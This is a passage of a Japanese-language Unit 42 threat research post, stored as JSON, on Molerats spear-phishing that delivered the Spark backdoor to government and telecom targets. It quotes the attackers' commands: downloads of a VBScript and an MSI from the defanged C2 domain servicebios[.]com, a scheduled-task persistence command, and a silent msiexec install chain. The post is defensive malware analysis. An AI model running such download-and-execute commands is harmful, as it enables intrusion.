{"id":105222,"date":"2020-03-10T00:25:36","date_gmt":"2020-03-10T07:25:36","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=105222"},"modified":"2020-03-10T00:25:36","modified_gmt":"2020-03-10T07:25:36","slug":"molerats-delivers-spark-backdoor","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","title":{"rendered":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1"},"content":{"rendered":"

\u6982\u8981<\/h2>\n

2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u306b\u304b\u3051\u3066\u3001Unit 42\u306f\u3001Molerats(\u5225\u540dGaza Hackers Team\u304a\u3088\u3073Gaza Cybergang)\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u3068\u307f\u3089\u308c\u308b\u3001\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u8907\u6570\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306f\u30016\u30ab\u56fd\u306b\u304a\u3051\u308b\u653f\u5e9c\u3001\u901a\u4fe1\u4e8b\u696d\u8005\u3001\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c\u3068\u3044\u3063\u305f8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u6700\u5f8c\u306e2\u3064(\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c)\u306f\u975e\u5e38\u306b\u7279\u7570\u306a\u3082\u306e\u3067\u3059\u3002\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u7d44\u7e54\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u3053\u308c\u307e\u3067\u306e\u6a19\u7684\u8a2d\u5b9a\u3068\u306f\u5408\u81f4\u305b\u305a\u3001\u7279\u7570\u306a\u30b1\u30fc\u30b9\u3067\u3059\u3002\u3053\u306e\u3088\u3046\u306a\u7279\u6b8a\u306a\u6a19\u7684\u3078\u306e\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u306f\u3001\u653f\u5e9c\u6a5f\u95a2\u3078\u306e\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u30c6\u30fc\u30de\u3068\u985e\u4f3c\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u696d\u7a2e\u56fa\u6709\u3001\u3059\u306a\u308f\u3061\u6a19\u7684\u306b\u56fa\u6709\u306e\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0 \u30c6\u30fc\u30de\u304c\u306a\u3044\u3068\u3044\u3046\u3053\u3068\u306f\u3001\u4fb5\u5bb3\u304c\u6210\u529f\u3059\u308b\u6a5f\u4f1a\u304c\u6e1b\u308b\u3053\u3068\u3092\u610f\u5473\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u3053\u308c\u3089\u306e\u7d44\u7e54\u3078\u306e\u653b\u6483\u76ee\u7684\u3092\u5224\u65ad\u3059\u308b\u969b\u306b\u6df7\u4e71\u304c\u751f\u3058\u307e\u3059\u3002<\/p>\n

\u3059\u3079\u3066\u306e\u653b\u6483\u3067\u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u6587\u66f8\u3092\u914d\u4fe1\u3059\u308b\u305f\u3081\u306e\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u306b\u306f\u3001\u53d7\u4fe1\u8005\u306b\u3088\u308b\u30a2\u30af\u30b7\u30e7\u30f3\u306e\u5b9f\u884c\u304c\u5fc5\u8981\u3068\u306a\u308a\u307e\u3059\u3002\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u306e\u624b\u6cd5\u306b\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u6709\u52b9\u5316\u3057\u3066\u30de\u30af\u30ed\u3092\u5b9f\u884c\u3055\u305b\u308b\u3088\u3046\u8a98\u5c0e\u3059\u308b\u305f\u3081\u306e\u30eb\u30a2\u30fc\u753b\u50cf\u3084\u3001\u6065\u305a\u304b\u3057\u3044\u5199\u771f\u3092\u30de\u30b9\u30b3\u30df\u306b\u516c\u8868\u3059\u308b\u3068\u8105\u3057\u3066\u3001\u60aa\u610f\u306e\u3042\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3081\u306e\u30ea\u30f3\u30af\u3092\u30e6\u30fc\u30b6\u30fc\u306b\u30af\u30ea\u30c3\u30af\u3055\u305b\u3088\u3046\u3068\u3059\u308b\u6587\u66f8\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306e\u307b\u3068\u3093\u3069\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001Spark<\/a>\u3068\u547c\u3070\u308c\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u653b\u6483\u8005\u304c\u4fb5\u5bb3\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u3067\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u958b\u3044\u3066\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u3067\u3059\u3002<\/p>\n

Spark\u30d0\u30c3\u30af\u30c9\u30a2\u306f\u5c11\u306a\u304f\u3068\u30822017\u5e74\u304b\u3089Molerats\u306b\u3088\u3063\u3066\u4f7f\u7528\u3055\u308c\u3066\u304a\u308a\u3001Gaza Cybergang\u306b\u3088\u308bOperation Parliament<\/a>\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u95a2\u4fc2\u3057\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u306e1\u3064\u3067\u914d\u4fe1\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001JhoneRAT<\/a>\u306b\u95a2\u4fc2\u3057\u3066\u3044\u308b\u3068\u307f\u3089\u308c\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u306b\u5225\u306e\u30ab\u30b9\u30bf\u30e0\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u8ffd\u52a0\u3057\u305f\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n

Molerats\u306f\u3001\u4e16\u754c\u4e2d\u306e\u653f\u5e9c\u6a5f\u95a2\u3092\u6a19\u7684\u3068\u3057\u3066\u3001\u4e3b\u306b\u4e0d\u6b63\u30a2\u30af\u30bb\u30b9\u3084\u6a5f\u5bc6\u30c7\u30fc\u30bf\u306e\u53ce\u96c6\u3092\u4f34\u3046\u653b\u6483\u306b\u95a2\u9023\u3059\u308b\u6d3b\u52d5\u30922011\u5e74\u304b\u3089\u884c\u3063\u3066\u3044\u307e\u3059\u3002PoisonIvy\u3084XtremeRAT\u306a\u3069\u306e\u4e00\u822c\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u30d0\u30c3\u30af\u30c9\u30a2\u30c4\u30fc\u30eb\u3092\u6d3b\u7528\u3057\u305f\u308a\u3001KASPERAGENT\u304a\u3088\u3073MICROPSIA<\/a>\u3068\u3044\u3063\u305f\u30ab\u30b9\u30bf\u30e0\u958b\u767a\u306e\u30c4\u30fc\u30eb\u3092\u4f5c\u6210\u3059\u308b\u306a\u3069\u3001\u591a\u6570\u306e\u6226\u8853\u3084\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u89b3\u6e2c\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u5f0a\u793e\u304c\u8ffd\u8de1\u3057\u305f\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306f\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u5f53\u521d\u306f\u521d\u671f\u306e\u611f\u67d3\u30d9\u30af\u30c8\u30eb\u306b\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3068\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u306e\u624b\u6cd5\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\u305d\u306e\u5f8c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u306b\u6bb5\u968e\u7684\u306a\u30b3\u30de\u30f3\u30c9\u30a2\u30f3\u30c9\u30b3\u30f3\u30c8\u30ed\u30fc\u30eb(C2)\u30b5\u30fc\u30d0\u30fc\u3092\u5229\u7528\u3059\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002<\/p>\n

Molerats\u306f\u3001\u914d\u4fe1\u6587\u66f8\u3092\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3057\u305f\u308a\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5b9f\u884c\u3092\u30a2\u30e9\u30d3\u30a2\u8a9e\u306e\u30ad\u30fc\u30dc\u30fc\u30c9\u3068\u30ed\u30b1\u30fc\u30eb\u3092\u4f7f\u7528\u3059\u308b\u30b7\u30b9\u30c6\u30e0\u3067\u306e\u5b9f\u884c\u306b\u306e\u307f\u5236\u9650\u3057\u305f\u308a\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u96e3\u8aad\u5316\u306b\u5546\u7528\u30d1\u30c3\u30ab\u30fc\u306eEnigma\u3092\u4f7f\u7528\u3057\u305f\u308a\u3059\u308b\u306a\u3069\u3001\u691c\u51fa\u3068\u5206\u6790\u3092\u56f0\u96e3\u306b\u3059\u308b\u305f\u3081\u306b\u3055\u307e\u3056\u307e\u306a\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u3002\u307e\u305f\u3001Spark C2\u30c1\u30e3\u30cd\u30eb\u306f\u30013DES\u307e\u305f\u306fAES\u306e\u3044\u305a\u308c\u304b\u3092\u4f7f\u7528\u3057\u3066\u3001HTTP POST\u8981\u6c42\u304a\u3088\u3073\u5fdc\u7b54\u306e\u30c7\u30fc\u30bf\u3092\u3001\u5404\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u4e00\u610f\u306b\u30e9\u30f3\u30c0\u30e0\u751f\u6210\u3055\u308c\u305f\u30ad\u30fc\u3067\u6697\u53f7\u5316\u3059\u308b\u3053\u3068\u3067\u3001\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n

<\/a>\u51fa\u767a\u70b9<\/h2>\n

2019\u5e7411\u6708\u3001Unit 42\u306f\u30b5\u30a6\u30b8\u30a2\u30e9\u30d3\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u306b\u5411\u3051\u305f\u4e00\u901a\u306e\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u8a8d\u8b58\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u653b\u6483\u3067\u306f\u3001\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u305fMicrosoft Word\u6587\u66f8\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u6587\u66f8\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u306f\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u672c\u6587\u5185\u3067\u88ab\u5bb3\u8005\u306b\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u653b\u6483\u3067\u767a\u898b\u3055\u308c\u305f\u30a2\u30fc\u30c6\u30a3\u30d5\u30a1\u30af\u30c8\u304b\u3089\u3001\u5f0a\u793e\u306fAutoFocus\u88fd\u54c1\u3092\u4f7f\u7528\u3057\u3066\u8ffd\u52a0\u306e\u653b\u6483\u3092\u78ba\u8a8d\u3057\u3001Molerats\u306b\u3088\u308b\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u898b\u3064\u3051\u51fa\u3059\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002<\/p>\n

\u5f0a\u793e\u306f\u3001AutoFocus\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u30012019\u5e7410\u67082\u65e5\u304b\u308912\u67089\u65e5\u306e\u9593\u306b\u653b\u6483\u8005\u304b\u3089\u9001\u4fe1\u3055\u308c\u305f\u3055\u307e\u3056\u307e\u306a\u653b\u6483\u3092\u898b\u3064\u3051\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306f\u653f\u5e9c\u6a5f\u95a2\u3084\u901a\u4fe1\u4e8b\u696d\u8005\u306e\u7d44\u7e54\u306b\u7e26\u65ad\u7684\u306b\u9001\u4fe1\u3055\u308c\u307e\u3057\u305f\u304c\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u306f\u7279\u5b9a\u306e\u4ef6\u540d\u304a\u3088\u3073\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u3068\u3001\u6c4e\u7528\u7684\u306a\u4ef6\u540d\u304a\u3088\u3073\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u304c\u6df7\u5728\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u3055\u3089\u306b\u3001\u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306b\u95a2\u3059\u308b\u30bb\u30c3\u30b7\u30e7\u30f3\u304c\u3001\u7c73\u56fd\u306e2\u3064\u306e\u7d44\u7e54\u306b\u95a2\u4e0e\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u305d\u306e1\u3064\u304c\u5c0f\u58f2\u3001\u3082\u30461\u3064\u304c\u4fdd\u967a\u696d\u754c\u3067\u3059\u3002<\/p>\n

\u3053\u308c\u3089\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u3059\u3079\u3066\u6587\u66f8\u5f62\u5f0f\u3067\u3001\u307b\u3068\u3093\u3069\u304cWord\u6587\u66f8\u30011\u3064\u304cPDF\u6587\u66f8\u3067\u3057\u305f\u3002\u88681\u306f\u3001\u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u30ea\u30b9\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a73\u7d30\u3068\u3001\u6a19\u7684\u3068\u306a\u3063\u305f\u7d44\u7e54\u306e\u56fd\u304a\u3088\u3073\u696d\u7a2e\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d6\u30ed\u30b0\u3067\u306f\u3001\u88681\u306b\u793a\u3055\u308c\u305f7\u4ef6\u306e\u914d\u4fe1\u6587\u66f8\u306e\u3046\u3061\u30013\u4ef6\u306b\u3064\u3044\u3066\u5206\u6790\u3057\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u540d\u306bMOFA\u306e\u5165\u3063\u305f4\u4ef6\u306e\u4e00\u610f\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u305d\u308c\u305e\u308c\u975e\u5e38\u306b\u985e\u4f3c\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u5f8c\u306e\u914d\u4fe1\u6587\u66f8('Urgent.docx')\u306f\u3001JhoneRAT\u3068\u547c\u3070\u308c\u308b\u65b0\u3057\u3044\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u95a2\u3059\u308bCisco Talos\u306e\u8abf\u67fb<\/a>\u3067\u8aac\u660e\u3055\u308c\u3066\u3044\u308b\u914d\u4fe1\u6587\u66f8\u3067\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u304c\u8a72\u5f53\u5730\u57df\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067JhoneRAT\u3082\u4f7f\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n
\u65e5\u4ed8<\/strong><\/td>\n\u4ef6\u540d<\/strong><\/td>\n\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb<\/strong><\/td>\nSHA256<\/strong><\/td>\n\u56fd<\/strong><\/td>\n\u696d\u7a2e<\/strong><\/td>\n<\/tr>\n
2019\u5e7410\u67082\u65e5<\/td>\nMOFA reports 03-10-2019<\/td>\nMOFA- 031019.doc<\/td>\nd19104ef4f443e8..<\/td>\n\u30a2\u30e9\u30d6\u9996\u9577\u56fd\u9023\u90a6<\/td>\n\u653f\u5e9c<\/td>\n<\/tr>\n
2019\u5e7410\u67083\u65e5<\/td>\n03-10-2019<\/td>\nMOFA- 031019.doc<\/td>\nd19104ef4f443e8..<\/td>\n\u82f1\u56fd\u3001\u30b9\u30da\u30a4\u30f3<\/td>\n\u653f\u5e9c<\/td>\n<\/tr>\n
2019\u5e7410\u67085\u65e5<\/td>\n06-10-2019<\/td>\nMOFA- 061019.doc<\/td>\n03be1d7e1071b01..<\/td>\n\u30a2\u30e9\u30d6\u9996\u9577\u56fd\u9023\u90a6<\/td>\n\u653f\u5e9c<\/td>\n<\/tr>\n
2019\u5e7410\u670810\u65e5<\/td>\nMOFA Reports<\/td>\nMOFA- 101019.doc<\/td>\n011ba7f9b4c508f..<\/p>\n

ddf938508618ff7..<\/td>\n

\u7c73\u56fd<\/td>\n\u4fdd\u967a\u3001\u5c0f\u58f2<\/td>\n<\/tr>\n
2019\u5e7410\u670831\u65e5<\/td>\n\u0644\u0639\u0646\u0627\u064a\u0629 \u0645\u0639\u0627\u0644\u064a\u0643\u0645 \u2013 \u0627\u0644\u0645\u0631\u0641\u0642 31-10-2019<\/td>\nattachment.doc<\/td>\neaf2ba0d78c0fda..<\/td>\n\u30b8\u30d6\u30c1<\/td>\n\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n
2019\u5e7411\u67082\u65e5<\/td>\n\u0644\u0639\u0646\u0627\u064a\u0629 \u0645\u0639\u0627\u0644\u064a\u0643\u0645 \u2013 \u0627\u0644\u0645\u0631\u0641\u0642 31-10-2019<\/td>\nattachment.doc<\/td>\neaf2ba0d78c0fda..<\/td>\n\u30b8\u30d6\u30c1<\/td>\n\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n
2019\u5e7411\u670818\u65e5<\/td>\n\u0635\u0648\u0631\u0643<\/p>\n

<\u7de8\u96c6\u6e08\u307f><\/p>\n

\u0645\u0639 \u0647\u0628\u0629<\/td>\n

Pictures.pdf<\/td>\n9d6ce7c585609b8..<\/td>\n\u30b9\u30da\u30a4\u30f3<\/td>\n\u653f\u5e9c<\/td>\n<\/tr>\n
2019\u5e7411\u670824\u65e5<\/td>\n\u0645\u062e\u0637\u0637 \u0627\u0644\u062c\u0647\u0627\u062f \u0627\u0644\u0627\u0633\u0644\u0627\u0645\u064a \u0644\u0645\u0628\u0627\u063a\u062a\u0629 \u0627\u0633\u0631\u0627\u0626\u064a\u0644 \u0648\u0636\u0631\u0628 \u0627\u0644\u062a\u0647\u062f\u0626\u0629<\/td>\nUrgent.docx<\/td>\n273aa20c4857d98..<\/td>\n\u30b8\u30d6\u30c1<\/td>\n\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n
2019\u5e7412\u67089\u65e5<\/td>\n\u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0642\u064a\u0627\u062f\u0629 \u0627\u0644\u0645\u062e\u0627\u0628\u0631\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629 \u0645\u0639 \u0648\u0641\u062f \u062d\u0631\u0643\u0629 \u062d\u0645\u0627\u0633 09-12-2019<\/td>\nUrgent.docx<\/td>\n273aa20c4857d98..<\/td>\n\u30b8\u30d6\u30c1<\/td>\n\u901a\u4fe1\u4e8b\u696d\u8005<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n

\u88681. \u3053\u306e\u653b\u6483\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u5224\u660e\u3057\u305f\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u8a73\u7d30<\/em><\/span><\/p>\n

<\/a>MOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8<\/h2>\n

\u53ce\u96c6\u3068\u5206\u6790\u3092\u884c\u3063\u305f\u6700\u521d\u306e\u6587\u66f8\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u306f\u3001MOFA- 061019.doc (SHA256: 03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506)\u3068\u3044\u3046\u3082\u306e\u3067\u3057\u305f\u3002\u3053\u306e\u6587\u66f8\u306f\u3001Abdullah@2019\u3068\u3044\u3046\u30d1\u30b9\u30ef\u30fc\u30c9\u3067\u30d1\u30b9\u30ef\u30fc\u30c9\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u6587\u66f8\u3092\u958b\u3044\u3066\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u304d\u306b\u3001\u56f31\u306b\u793a\u3059\u6b20\u843d\u3057\u305f\u753b\u50cf\u3092\u542b\u3080\u30b3\u30f3\u30c6\u30f3\u30c4\u304c\u88ab\u5bb3\u8005\u306b\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n

\"Figure<\/span><\/p>\n

\u56f31. MOFA\u3068\u5165\u3063\u305f\u914d\u4fe1\u6587\u66f8\u5185\u306e\u30eb\u30a2\u30fc\u753b\u50cf<\/span><\/p>\n

\u88ab\u5bb3\u8005\u304c\u6587\u66f8\u5185\u306e\u57cb\u3081\u8fbc\u307f\u30de\u30af\u30ed\u3092\u6709\u52b9\u5316\u3059\u308b\u3068\u3001\u30de\u30af\u30ed\u306b\u3088\u3063\u3066\u57cb\u3081\u8fbc\u307f\u306eVBScript (T1064<\/a>)\u304c\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u3001C:\\programdata\\Micorsoft\\Microsoft.vbs\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002Microsoft.vbs\u30b9\u30af\u30ea\u30d7\u30c8\u306fC2\u30c9\u30e1\u30a4\u30f3\u306eservicebios[.]com\u306b\u30a2\u30af\u30bb\u30b9\u3057\u30012\u756a\u76ee\u306eVBScript\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306e\u8ffd\u52a0\u306e\u6307\u793a\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u6b21\u306eURL\u304b\u30892\u756a\u76ee\u306eVBScript\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001C:\\ProgramData\\PlayerVLC.vbs\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n

https:\/\/servicebios[.]com\/PlayerVLC.vbs<\/span><\/p>\n

\u6700\u521d\u306eVBScript\u306f\u3001\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u30012\u756a\u76ee\u306eVBScript\u30921\u5206\u3054\u3068\u306b\u5b9f\u884c\u3057\u7d9a\u3051\u308b\u305f\u3081\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af(T1053<\/a>)\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002<\/p>\n

schtasks \/create \/sc minute \/mo 1 \/tn PlayerVLC \/F \/tr C:\\ProgramData\\PlayerVLC.vbs<\/p>\n

2\u756a\u76ee\u306eVBScript\u306f\u3001\u6b21\u306eURL\u304b\u3089\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u3001C:\\ProgramData\\PlayerVLC.msi\u306b\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n

https:\/\/servicebios[.]com\/PlayerVLC.msi<\/span><\/p>\n

\u5b9f\u884c\u53ef\u80fd\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f\u5f8c\u30012\u756a\u76ee\u306eVBScript\u306f\u3001\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u3067\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066(T1059<\/a>)\u65e2\u5b58\u306emsiexec.exe\u30d7\u30ed\u30bb\u30b9 \u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u3092\u5f37\u5236\u7d42\u4e86\u3057\u3001ping\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u30662\u79d2\u9593\u30b9\u30ea\u30fc\u30d7\u3055\u305b\u3066\u304b\u3089\u3001\u6b63\u898f\u306emsiexec.exe\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3066(T1218<\/a>)\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u305fPlayerVLC.msi\u30d5\u30a1\u30a4\u30eb\u3092\u8d77\u52d5\u3057\u307e\u3059\u3002<\/p>\n

%comspec% \/c taskkill \/F \/IM msiexec.exe & ping 127.0.0.1 -n 2 >NUL & msiexec \/i C:\\ProgramData\\PlayerVLC.msi \/quiet \/qn \/norestart<\/span><\/p>\n

\u6b8b\u5ff5\u306a\u3053\u3068\u306b\u3001PlayerVLC.msi\u30d5\u30a1\u30a4\u30eb\u306fC2\u30b5\u30fc\u30d0\u30fc\u306b\u3088\u3063\u3066\u30db\u30b9\u30c8\u3055\u308c\u306a\u304f\u306a\u3063\u3066\u3044\u308b\u305f\u3081\u3001\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u53d6\u5f97\u3059\u308b\u3053\u3068\u306f\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u611f\u67d3\u3092\u6210\u529f\u3055\u305b\u308b\u305f\u3081\u306bC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u6709\u52b9\u306a\u901a\u4fe1\u30c1\u30a7\u30fc\u30f3\u304c\u5fc5\u8981\u3068\u306a\u308b\u30e2\u30b8\u30e5\u30fc\u30eb \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u5229\u70b9\u3092\u5f37\u8abf\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001\u4fb5\u5165\u5f8c\u306e\u5206\u6790\u304c\u56f0\u96e3\u306b\u306a\u308b\u304b\u3089\u3067\u3059\u3002\u3053\u306e\u30bf\u30a4\u30d7\u306e\u30e2\u30b8\u30e5\u30fc\u30eb 